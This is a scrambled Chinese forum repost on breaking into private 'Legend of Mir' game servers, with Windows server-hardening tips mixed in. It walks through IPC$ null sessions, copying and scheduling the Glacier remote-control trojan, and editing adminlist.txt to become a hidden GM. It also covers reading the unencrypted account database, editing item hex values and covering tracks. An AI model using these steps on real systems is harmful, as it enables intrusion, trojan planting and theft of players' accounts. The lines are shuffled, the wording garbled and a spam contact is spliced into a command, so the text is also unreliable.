智的选择,http://www.up575.com/viewthread.php?tid=55716&extr a=page=1,但进去时也没有好装备,也是受人欺侮,难道我不可以做gm?试试,folling me!
(二)流光2000
第二步:copy g-server.exe \ip\admin$\system32 阐明:g-server.
然后输入:net user(回车健)
攻击低级教学
前面那位朋友所概述的重要是针对WIN2000系统弱口令的安全设置!他已经说得很细心了,做到那些,口令这一关差
修炼后:0a
修炼前:00
目前在黑客横行的互联网空间中,应用IIS的破绽,提申自己的权限,而成为AD,这些只是轻而易举的事情,这不需要花几天的时间去暴力破解一下口令,像自己架设的WEB服务器有种情形,更是数不甚数了.关于怎应用UNICODE破绽去供给AD权限的文章,网上太多了,我就未几讲了.
反复上面的把自己从adminlist.txt里删了,哈哈,好装备得手了,可以玩了
1)c:/>net use 192.168.0.1ipc$ "" /user:administrator
,
输入net user 帐号名 需修正密码(然后回车健)
选好一个,192.168.0.1,go!
2000服务器版装下去会主动装IIS的,若你认为IIS没有什么用就停滞.IIS地址:开端》》程序》》管理工具》》Internet信息服务(这个就是IIS)你将他开启.上面按结束!这样就进一步安全了.不过若IIS你需要用的话,哪么记得打目前最新的补丁SP4哦.
这里有个id.db所有人的帐号和密码都在了,你看着办吧,不过偷人家的号也不是什么光彩的事,我是从来不做的,只是经常会拿gm的号来reload一下.呵呵
/who
access找开来改一下,改几个极品,如0-80攻的木剑啊,0-50魔的六角戒指之类的,那就随你的便了.只是这样也太烦人了.呵呵.
下一步如何做呢?也许在你查对方的端口时发现对方开的端口很少,比如ftp没开,怎办呢?冰河! "冰河",想必很多朋友都玩过,使用冰河掌握一台服务器速度很快,(因为服务器那边带宽很大)几分钟就可以查到对方主机的主页所在地位.但是如何上传并且节制他呢? "
例:上面的屠龙显示出来是攻击:5-36,道术:0-2,魔法:0-3.
5)c:>attrib r h 192.168.0.1d$mirs有需要联系QQ:595414817 Tell:15160446243ervermir200enviradminlist.txt
这时我们就可以掌握服务器了,
虽感到是好玩,但玩盛大的简直是在受罪,升级慢,没好装备,处处受人欺侮.所以,4f是明
升级胜利,255级,哈哈
我在侵入别人4f所应用的方式
一般密码设庞杂一点!
下面是怎么做非法GM而不在GM文件里表示出来,也不是什么后门的问题,请看转帖,盼望大家严加防备~
系统自带的超级管理员帐号是administrator
第二天注册个帐号,新建个之前加的人名进去,
服务器入侵重要靠的是帐号与密码.大家要先清楚什么是系统帐号.什么是系统密码!
看这个
记住这里显示出来多个帐号不明的帐号.哪就证实你机器不安全了.若呈现在的帐号都是你自已的帐号.哪百分之四十你机器未被入侵
一:懂得一下帐号的含义
再查看治理员帐号
当前150人在线
一但这些被黑客扫描到的话,哪么你将会得到一个恐怕的要挟!
没有?不可能吧?唔,必定是暗藏了,没关系,再来,
一些SF为什么存在非法GM的真正原因~
ce 00 43 12 88 13 01 02 03 04 05 06 07 08 09 00 00 0a
给兵器加攻击时:
前面**的是物品代码,然后0xce 00 是武器代码(高位在后),和物品db数据库中对应,
帐号安全:
2009年12月18日
然后,把你参加adminlist的人物从adminlist里删除,好了,你进去游戏吧,你是gm了,可是真正的gm是不会从服务器端看到你的名字呢!!他也许在想"这里怎么了啊?似乎还有个gm???".呵呵,不过不要过分了,不然人家一个reload你的权限就没了啊.
这些来说应当是服务器安全防备方面的一个例子而已,真正要做到服务器的安全运行,需要你花大批的时间去探索.因为这些来说,足以敷衍一些无聊的.....当然了,你如果需要WEB服务器,我还是建议你去使用AP了.他的源代码开发,免费,安全性稳固性都比IIS强得多了.
这次连复制也不用了,直接改吧,
私服技巧我是一点都不懂.不过服务器安全方面还是略懂一二哦!
mir.db里面有每个人的数据,并且没加密的,大家可以用
先运行CMD
这里,我把你边走边看加到这个服务器的adminlist,呵呵,这里是打个比喻,这里参加你的名字),然后,我们到mir.db中找出gm的帐号,再到id.
对于首饰和衣服,自己研讨吧,这有好多人都知道的吧,我没细写.网上这方面的文章是有的,我就不用多说了吧?
4)c:>edit 192.168.0.1d$mirservermir200enviradminlist.txt
当你私服是人气高的时候.给黑客入侵的话,http://hd7s433siw.ycool.com/post.2806616.html,哪要是万一给删了数据.到时候.真的是惨不忍堵.
输入:net localgroup administrators
在IIS组件你首先要去掉你不须要的SMTP,SNNP,FTP,这样的话你可以下降你服务器运行所占用的CPU资源,和内存应用率.然后建议你删除你C:\INTERPUB\目录下的所有内容!或者更改路径.在IIS治理器中删除默认站点,(或者删除SCRIPTS这个虚拟目录)由于这个目录有可写的权限的.在新建的WEB站点中,设置IIS的权置,必需让它不能写入,或运行.因为IIS是默认支撑ASP脚本的.然后在IIS中删除不需要的映射,这个很主要.如果你要支撑PHP,CGI脚本的话,你还得配置好PHP.CGI的利用程序的准确映射,禁用或删除FSO组件,(去年深圳之窗就
我爱玩游戏,但却玩得很菜,也没有时光去玩,只想玩着过瘾,所以,当我开端玩传奇时,
3)c:>attrib -r -h 192.168.0.1d$mirservermir200enviradminlist.txt
实验胜利后:00,攻击值增添.
这样的话系统就不默认启动改服务!
例:43 12换算成十进制为17170,持久度为17
比如武器,数据格局如下(全体是16进制)
后面的 43 12是当前持久度,88 13是最大持久度.
溢出:
后面的04 05 06 07 08 09依次是兵器的 荣幸、咒骂、正确、攻击速度、强度.
2)c:/>copy 192.168.0.1d$mirservermir200enviradminlist.txt
@level -1
net use * \ip\*$ 远程映射
会打开个介面,看看里面有哪些gm,加个吧,自己记得就行了,改完保留退出
把adminilist.txt还原成只读暗藏,
修正密码方式,在DOS下修正更安全
具体操作如下:
到这里大家做gm的梦就完成了,下面我说的就是怎么远程节制服务器主机了,比如给他关机啊重启啊....
现在,就等着体系重启了,等不及的话就在第五步让它重启,不过这样太危险了,还是等吧
例:物品数据库中屠龙是序号(idx)是205,对应到这里就是(205 1)转为16进制是ce
实在我所使用的办法很简略,只有4个工具:
入侵传奇私服/充任非法GM.
今天先讲一个方面的内容了,也算是对前面的朋友的进一步弥补吧!
你若感到自已的帐号密码是123456哪么不出三秒人家就到你机上一游了.
ok,连上了,成功在望,
第一步:net use \ip\ipc$ "password" /user:"user" 阐明:以一个超级用户名与你想黑的网站树立联接,当然超级用户必须是该网站admin里的.这里的"ip"就是主机了,"password"就是超级用户的密码,"user"就是超级用户.比如:net use 0.248.250.2\ipc$ "maozhiie" /user:"maozhijie"
找来一大堆4f的ip,开个x-scan扫吧.有了,还真不少,都是弱口令的,这些网管真菜呀.
后面的01 02 03依次是攻击、魔法、道术.
如果你须要用IIS来建站宣扬一下自己的私服,你就必须按以下办法安全配置好IIS,
面记得有位朋友对增强对服务器安全性的解决办法进行了一系列的阐明,讲得非常具体,但是我感到还有很多需要弥补的处所.微软的系统是破绽和补丁著称,真正要对服务器的安全配置确切非常艰苦,斟酌的方面也太多了.
二:密码篇
衔接成功,
(一):shed.exe
这样后,会显示一例帐号
大家千万要记住.入侵系统最关点的就是要帐号密码.维护好自已帐号与密码.安全必定属于你!
好了,大功告成,快扫除脚印吧,别让人发明被入侵了,
首先,我得声明,我写本文并不是教大家如何去黑4f,只是想以本文引起宽大4f拥有者的注意
系统找不到指定的文件.
如何在别人的私服做GM????
下面我都WIN2000的WWW(IIS)服务器安全配置略讲一下,WWW服务在WIN2000SERVER,ADSERVER,DATACENTERSERVER,版本中是默认安装的,如果你不需要用2000的WWW服务的话,建议不要安装.至于添加/删除你可以把持面板的去掉他的安装,或者在"管理工具"/"服务"里设置WORD WIDE WEB SERVICE"启动类型为"手动/禁用"
再造出想要的装备,想要什么纵情造吧,
看到有些4f做的不错,但是进去又不是很有钱,也没装备,高手也很多,一直不爱好在里面当菜鸟的我,一口吻进入他们的服务器端大闹一番之后.当足了gm的瘾,现在我把方式颁布与大家....
(四)冰河8.4 操作系统:win2000 server 或者winxp系统. "shed.exe":实在就是用来网上查共享资源的,速度快,可以查到很多服务断的共项文件,不过在这里面有些ip在阅读器中无法拜访,这是由于其中也包括了个人上网的ip.呵呵!一些作网站,网吧的服务器一些目录都是共享的,有些是可以访问,轻变传奇私服,但是不能删除,因为你所拜访的都是以匿名拜访的,所以权限不够!有些须要密码.碰到密码怎办?用流光! "流光"虽说对202作了限制,但是对小日本的ip可是没有限制的,呵呵!所以说应用流光的ipc探测,树立一个空对话,查到用户列表,然后先简略探测,此时有些网管怠惰,把administrator设置的过于简略,呵呵,你就可以抓到了.
第三步:net time \ip 观察对方的服务器时间.由于有时差,应当是一个小时吧!所以必需要以对方的服务器时光为准.
,进步自己的网管程度.
以上文章转自中国GM基地_私服论坛|传奇服务端|传世服务端
其它WINDOWS每一个体系都有着他的超级治理员帐号与密码!
哈,我就是gm了.赶紧把自己升级,
打开cmd,
假如说你在这方面做得非常的细心.但你至少还要细心研讨一下你主机现在所运行的有哪些服务,这些服务代表着什么?你应该很明白!由于现在黑客软件,木马工具,远程节制软件大多是以一种服务的情势运行在你的服务器体系里,一般的防火墙,杀毒软件对其并没有任何反应的.对于服务情势呈现的把持工具.比拟难得发明,所以你就必需在服务器里运行的哪些服务非常熟习.对于生疏或奇异的服务应当安全设置好.
注意是在原武基本上增添.
然后到,|mirserver\mud2\logsrv\iddb下
(三)cmd.exe (实在就是2000下的dos啦)!
本文引起宽大4f拥有者的注意
RPC溢出.大家记住,试试telnet IP 135看看有没有开着.若是开着.请打RPC补丁.若找不到.干脆装个防火墙,将135端屏蔽!
第四步:at \ip time g-server.exe 这里的time就是对方的主机时间.作用:在规定时光履行该程序.比如 at 0.248.250.2 19:55 g-server.exe 第五步:冰河就可以把持该电脑了.这个我就不说了吧,呵呵!菜鸟也会玩的软件.
后面两个空位后紧跟的0x0a是表现兵器是否被修炼,具体来说
这就是查看administrators组的用户.这样的话若是人家用暗藏帐号的方法也会查出来!